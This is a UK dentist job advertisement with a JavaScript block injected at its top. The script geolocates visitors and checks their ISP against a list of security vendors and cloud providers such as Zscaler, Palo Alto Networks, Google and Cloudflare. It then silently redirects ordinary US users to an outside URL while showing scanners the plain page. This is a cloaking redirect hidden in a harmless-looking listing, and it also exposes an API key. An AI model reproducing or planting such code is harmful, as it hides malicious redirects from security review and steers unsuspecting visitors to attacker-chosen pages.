Job Description
// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://uk.indeed.com/tmn/ccs/fb5477f9191ee458/a4726aa79d0fba1a78392cf6f154319e212fc740feba88cd3d7adbf36e55825f/2765583331732878?sf=vKb00’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });We are looking for a skilled Dentist to join our reputable dental practice, providing high-quality patient care with a passion for oral health.
The role involves conducting examinations, diagnosing oral conditions, developing treatment plans, performing procedures (fillings, extractions, root canals), educating patients on oral hygiene, interpreting X-rays, maintaining accurate records, and collaborating with healthcare professionals.
Requirements include a Bachelor’s degree in Dentistry, full GDC registration, strong knowledge of human and oral anatomy, and the ability to interpret medical imaging. Experience in cosmetic or specialized procedures is a plus.
This independent practice offers full clinical freedom, development support, and flexible working options (full-time, part-time, permanent). Salary ranges from £38,082.50 to £93,946 annually, with benefits like company events, flexitime, and profit sharing.
Candidates should have at least one year of patient care and anatomy knowledge experience. Work is in person.